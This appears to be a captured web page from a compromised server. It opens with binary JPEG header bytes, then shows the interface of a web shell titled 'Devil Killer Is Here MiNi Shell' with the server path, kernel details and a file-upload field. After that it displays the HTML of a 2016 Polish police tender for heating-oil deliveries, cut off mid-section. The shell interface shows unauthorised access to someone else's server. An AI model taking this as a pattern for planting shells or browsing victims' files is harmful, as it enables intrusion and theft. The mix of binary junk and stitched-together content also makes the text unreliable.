JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/357305-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.katowice.kwp.policja.gov.pl/' target='_blank'>http://bip.katowice.kwp.policja.gov.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 357305 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Katowice: ZP-2380-489-77/2016 Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Komenda Wojewódzka Policji w Katowicach, krajowy numer identyfikacyjny
              27020829200000, ul.
              ul. J. Lompy 
              19,
              40038  
              Katowice, woj.
              śląskie, państwo
              Polska, tel.
              322 002 050, e-mail
              zamowienia@slaska.policja.gov.pl, faks
              322 002 060.
              <br />
              Adres strony internetowej (URL): http://bip.katowice.kwp.policja.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.katowice.kwp.policja.gov.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23.11.2012- prawo pocztowe, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Komenda Wojewódzka Policji w Katowicach, Zespół Zamówień Publicznych, 40- 038 Katowice, ul. J. Lompy 19, blok A, parter  </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ZP-2380-489-77/2016 Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r. <br /><b>Numer referencyjny: </b>ZP-2380-489-77/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
2. Zamówienie obejmuje zakup i dostawę oleju opałowego, grzewczego dla jednostek terenowych Policji Garnizonu Śląskiego w podziale na 11 n/w zadań, zgodnie z załącznikiem nr 3 do SIWZ  szczegółowy wykaz jednostek terenowych:
Zadanie nr 1  zakup i dostawa oleju opałowego, grzewczego dla KMP Bielsko-Biała, IV KP, ul. Komorowicka 235
Zadanie nr 2  zakup i dostawa oleju opałowego, grzewczego dla KMP Chorzów, I KP, ul. S. Batorego 19
Zadanie nr 3  zakup i dostawa oleju opałowego, grzewczego dla KMP Chorzów, II KP, ul. Moniuszki 11
Zadanie nr 4  zakup i dostawa oleju opałowego, grzewczego dla KPP Kłobuck, KP Krzepice, ul. Mickiewicza 34
Zadanie nr 5  zakup i dostawa oleju opałowego, grzewczego dla KMP Mysłowice, ul. Starokościelna 2
Zadanie nr 6  zakup i dostawa oleju opałowego, grzewczego dla KMP Sosnowiec, II KP, ul. Żeromskiego 1
Zadanie nr 7  zakup i dostawa oleju opałowego, grzewczego dla KPP Wodzisław Śl., KP Pszów, ul. Paderewskiego 33
Zadanie nr 8  zakup i dostawa oleju opałowego, grzewczego dla KPP Zawiercie, KP Szczekociny, ul. Parkowa 4
Zadanie nr 9  zakup i dostawa oleju opałowego, grzewczego dla KPP Żywiec, KP Jeleśnia, ul. Kazimierza 79
Zadanie nr 10  zakup i dostawa oleju opałowego, grzewczego dla KPP Żywiec, KP Rajcza, ul. Górska 3
Zadanie nr 11  zakup i dostawa oleju opałowego, grzewczego dla KPP Żywiec, KP Milówka, ul. Kazimierza 120
3. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
4. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
5. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
6. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><br /><b>II.5) Główny kod CPV: </b>09135100-5<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1.3 spełniają warunki udziału w postępowaniu dotyczące: kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej - Wykonawca spełni warunek jeżeli wykaże: aktualną na dzień składania ofert  posiada koncesję na wykonanie działalności gospodarczej w zakresie obrotu paliwami i energią zgodnie z art. 46 ust. 1 pkt 3 ustawy z dnia 2 lipca 2004 roku o swobodzie działalności gospodarczej (tekst jednolity Dz. U. z 2013 r., poz. 672 z późn. zm.) na obrót olejem opałowym, grzewczym bez ograniczeń.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1.2.Spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej- Wykonawca spełni warunek jeżeli wykaże: Wykonawca musi wykazać się posiadaniem niezbędnej wiedzy i doświadczenia w zakresie wykonania zamówienia polegającym na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej jednej dostawy lub kilku dostaw w ramach jednej umowy dla danego zadania (w przypadku dostaw sukcesywnych lub ciągłych, wartość zrealizowanych dostaw na dzień składania ofert musi odpowiadać co najmniej wartości wskazanej dla danego zadania).na zadanie nr 1  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 5.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 5.000,00 zł netto.2 na zadanie nr 2  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 15.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 15.000,00 zł netto.3 na zadanie nr 3  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 18.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 18.000,00 zł netto.
4 na zadanie nr 4  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 5.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 5.000,00 zł netto.5 na zadanie nr 5  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 31.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 31.000,00 zł netto.6 na zadanie nr 6  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 30.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 30.000,00 zł netto.7 na zadanie nr 7  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 9.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 9.000,00 zł netto.8 na zadanie nr 8  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 8.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 8.000,00 zł netto.9 na zadanie nr 9  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 4.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 4.000,00 zł netto.10 na zadanie nr 10  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 6.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 6.000,00 zł netto.11 na zadanie nr 11  polegającej na dostawie oleju opałowego grzewczego o wartości co najmniej 7.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości łącznej, co najmniej 7.000,00 zł netto.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">3. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. oraz art. 24 ust. 5 pkt 1 ustawy;
4. Informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
5. Oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się
o zamówienie publiczne.
6 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast
dokumentów, o których mowa w rozdziale IV SIWZ:
6.1 ust. 5  składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny
dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie
określonym w art. 24 ust. 1 pkt 13, 14 i 21;
6.2 ust. 4  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
7. Dokumenty, o których mowa w pkt. 6 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
8. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba,
której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 7, zastępuje się je dokumentem
zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego
reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem
sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na
siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis ust. 8 stosuje się;
9. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do
właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce
zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu;
10. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce
zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w punkcie 5, składa
dokument,o którym mowa w w punkcie 7 w zakresie określonym w art. 24 ust. 1 pkt 14 i 21. Jeżeli w kraju, w którym
miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go
dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce
zamieszkania tej osoby. Przepis punktu 8 zdanie pierwsze stosuje się.
11 W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do
właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie
niezbędnych informacji dotyczących tego dokumentu.
12.  Jeżeli Wykonawca, wykazując spełnianie warunków będzie polegał na zasobach innych podmiotów na zasadach
określonych w art. 22a ust. 1 i 2 ustawy Prawo zamówień publicznych: pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz dokumenty dotyczące:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki łączy lub będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
13. Wykonawca wykazując spełnianie warunków, o których mowa w art 22 ust.1 ustawy Pzp, polegający na zasobach
innych podmiotów na zasadach określonych w art. 22a ust. 1 i 2  ustawy Pzp, a jeżeli podmiot ten będzie brał udział
w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla
Wykonawcy wymienionych w pkt 3 Rozdziału IV B SIWZ.
14. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty o których mowa w Rozdziale IV  B  pkt 2-5 każdy z członków konsorcjum składa oddzielnie, natomiast dokumenty wymienione w rozdziale IV  B  pkt 1 mogą złożyć wspólnie.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz dostaw wykonanych, a w przypadku dostaw okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku dostaw okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.
W przypadku dostaw okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wykaz musi potwierdzać spełnienie warunku udziału w postępowaniu w zakresie określonym w rozdziale III punkt 1.2. do SIWZ Wykaz powinien zostać złożony w formie zgodnej ze wzorem stanowiącym załącznik nr 4 do SIWZ. 2. Koncesja na wykonanie działalności gospodarczej w zakresie obrotu paliwami i energią zgodnie z art. 46 ust. 1 pkt 3 ustawy z dnia 2 lipca 2004 roku o swobodzie działalności gospodarczej (tekst jednolity Dz. U. z 2013 r., poz. 672 z późn. zm.) na  obrót olejem opałowym, grzewczym bez ograniczeń,<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
